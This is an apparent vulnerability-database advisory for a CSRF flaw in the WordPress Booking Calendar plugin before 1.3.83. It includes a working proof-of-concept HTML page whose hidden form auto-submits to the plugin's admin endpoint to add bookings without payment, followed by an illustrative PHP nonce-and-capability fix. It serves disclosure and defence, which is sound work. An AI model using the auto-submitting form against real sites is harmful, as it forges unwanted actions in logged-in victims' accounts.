Source: wpexploit
Author: Sushil Phuyal
WPEX-ID: EB383600-0CFF-4F24-8127-1FB118F0565A
History: Feb 28, 2024 - 12:00 a.m.

Booking Calendar < 1.3.83 - CSRF appointment scheduling

Published: 2024-02-28 00:00:00
Author: Sushil Phuyal
Tags: csrf appointment scheduling, exploit, hidden form

AI Score: 6.7 Medium (confidence: Low)
EPSS: 0.0004 Low (percentile: 9.0%)

Description: The plugin lacks CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions via CSRF, such as adding a booking to the calendar without paying.

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=cpabc_appointments.php&cal=1&addbk=1&r=0.1210213745316624" method="POST">
      <input type="hidden" name="cpabc_appointments_post" value="1" />
      <input type="hidden" name="cpabc_appointments_utime" value="GMT 5.75" />
      <input type="hidden" name="cpabc_item" value="1" />
      <input type="hidden" name="selDaycal1" value=";2024,1,18 16:00" />
      <input type="hidden" name="selMonthcal1" value=";2024,1,19 16:00;2024,1,20 16:00;2024,1,21 16:00;2024,1,22 16:00" />
      <input type="hidden" name="selYearcal1" value="" />
      <input type="hidden" name="selHourcal1" value="" />
      <input type="hidden" name="selMinutecal1" value="" />
      <input type="hidden" name="sendemails_admin" value="1" />
      <input type="hidden" name="freq" value="10" />
      <input type="hidden" name="bydaym" value="1" />
      <input type="hidden" name="end" value="on" />
      <input type="hidden" name="phone" value="91" />
      <input type="hidden" name="name" value="hacker" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="question" value="hackeone" />
      <input type="hidden" name="subbtn" value="Continue" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
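For contrast with the unprotected request above, here is an added mitigation example showing how a WordPress handler for that booking submission would reject a cross-site auto-submitted form. This is illustrative code written for this page, not the Booking Calendar plugin's own code: the function names, the nonce action, the `manage_options` capability and the option-based storage are assumptions; only the request field names are taken from the form above.

```php
<?php
// Added illustrative example, not the Booking Calendar plugin's code.
// Hypothetical handler for the add-booking POST shown in the proof of concept.

const CPABC_DEMO_NONCE_ACTION = 'cpabc_demo_add_booking'; // hypothetical action name
const CPABC_DEMO_NONCE_FIELD  = '_cpabc_demo_nonce';      // hypothetical field name

// Renders the add-booking form with a nonce bound to the action above.
// wp_nonce_field() emits a hidden input holding a per-user, per-session token
// that a page on another origin cannot read, so it cannot be copied into a CSRF form.
function cpabc_demo_render_add_booking_form() {
    echo '<form method="post">';
    wp_nonce_field( CPABC_DEMO_NONCE_ACTION, CPABC_DEMO_NONCE_FIELD );
    echo '<input type="hidden" name="cpabc_appointments_post" value="1" />';
    echo '<input type="text" name="name" /><input type="text" name="email" />';
    echo '<input type="text" name="phone" /><input type="text" name="selDaycal1" />';
    echo '<input type="submit" name="subbtn" value="Continue" /></form>';
}

// Handles the POST. The nonce check is the control the vulnerable version lacks:
// with it, the hidden form in the proof of concept dies at check_admin_referer().
function cpabc_demo_handle_add_booking() {
    if ( empty( $_POST['cpabc_appointments_post'] ) ) {
        return; // not a booking submission
    }
    // Assumed capability; the plugin's real requirement may differ.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // Verifies the nonce (and, on failure, stops with "The link you followed has expired").
    // A forged request carries no valid token, so the booking is never stored.
    check_admin_referer( CPABC_DEMO_NONCE_ACTION, CPABC_DEMO_NONCE_FIELD );

    $booking = array(
        'item'  => absint( $_POST['cpabc_item'] ?? 0 ),
        'name'  => sanitize_text_field( wp_unslash( $_POST['name'] ?? '' ) ),
        'email' => sanitize_email( wp_unslash( $_POST['email'] ?? '' ) ),
        'phone' => sanitize_text_field( wp_unslash( $_POST['phone'] ?? '' ) ),
        'slots' => sanitize_text_field( wp_unslash( $_POST['selDaycal1'] ?? '' ) ),
    );
    cpabc_demo_store_booking( $booking );
}

// Hypothetical persistence: appends the booking to a WordPress option.
function cpabc_demo_store_booking( array $booking ) {
    $all   = get_option( 'cpabc_demo_bookings', array() );
    $all[] = $booking;
    update_option( 'cpabc_demo_bookings', $all );
}

add_action( 'admin_init', 'cpabc_demo_handle_add_booking' );
```

The nonce is only one half of the fix: the capability check above ensures that even a valid token from a low-privileged account cannot create bookings, and the sanitizers keep the stored values bounded to what the handler expects.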

